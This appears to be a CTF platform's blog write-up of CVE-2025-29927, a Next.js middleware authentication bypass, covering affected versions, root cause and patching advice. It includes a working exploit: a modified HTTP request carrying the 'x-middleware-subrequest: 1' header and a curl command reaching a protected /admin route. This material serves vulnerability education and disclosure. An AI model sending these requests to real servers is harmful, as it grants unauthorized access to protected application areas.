What is Next Next.js?
Next.js is a web development framework developed by Vercel build top of React
which enable developers to build fast, scalable, high-performance and user-friendly web application
What is this Vulnerability About?
21 Mar 2025, CVE-2025-29927 was made public by Next,js maintainers and this
vulnerability can lead to Authentication bypass. This vulnerability is discovered by
Rachid and Yasser Allam and possible to bypass authentication if they occur in
middleware. Middleware is a powerful feature that allows developers to run custom
code before a request is completed. This can be done by crafted HTTP request that
contains the internal header ‘x-middleware-subrequest’ This effect version earlier than 15.2.3 for 15.x, earlier than 12.3.5 for 12.x, earlier than 13.5.9 for 13.x, earlier than 14.2.25 for 14.x
🚨 New Arena Lab Dropped!
— Parrot CTFs (@parrot_ctfs) April 11, 2025
Middleman (CVE-2025-29927) is now live on Parrot CTFs!
💥 Learn how to exploit a middleware authentication bypass in Next.js and gain access to protected routes.
🔓 Easy difficulty – perfect for sharpening your web exploitation skills!
🏆 Earn 10… pic.twitter.com/aThJCF7J6d
How is this vulnerability exploitable?
The victim Next.js server must employ a Next.js middleware to exploit this
vulnerability, which is quite simple and straightforward.
This consists of middleware.ts file. Incoming requests can be redirected, rewritten,
or modified before the handler processes them thanks to the middleware function,
which stands between the request and the final response.
Technical Analysis
- This is the scenario for CVE-2025-29927
- As we discussed earlier , victim should use the middleware feature to perform
authentication on Next.js server . ( no other authentication layer )
‘x-middle-subrequest’ indicates that request is an internal subrequest that was
initiated by middleware rather than a direct request from a user. The correct
operation of several internal Next.js features depends on this header. By
maintaining track if the middleware because the existence of this header prevents
endless repetitive loops. However, because the existence of this header implies
that the request should avoid specific middleware tests, this approach may
inadvertently introduce a vulnerability that permits authentication bypass.
Exploitation Method
Modify this request
GET /admin HTTP/1.1
Host: 192.168.248.133
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: keep-aliveTo This Request
GET /admin HTTP/1.1
Host: 192.168.248.133
x-middleware-subrequest: 1
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: keep-aliveWe can made request through curl command line utility .
curl -H "x-middleware-subrequest: 1" http://<machine-ip>/adminConclusion
how a seemingly innocuous internal header in Next.js may circumvent important
middleware checks, allowing illegal access to restricted routes. It acts as a
reminder of how important it is to keep up with dependency updates and audit
authorization logic. Patching CVE-2025-29927 should be a top priority for
organizations employing Next.js applications that are available to the public to
lessen vulnerability to this kind of exploit.
You can check out our lab as well:
Comments (1)
Jonny nickssays:
April 10, 2025 at 6:08 pmAwesome dogslice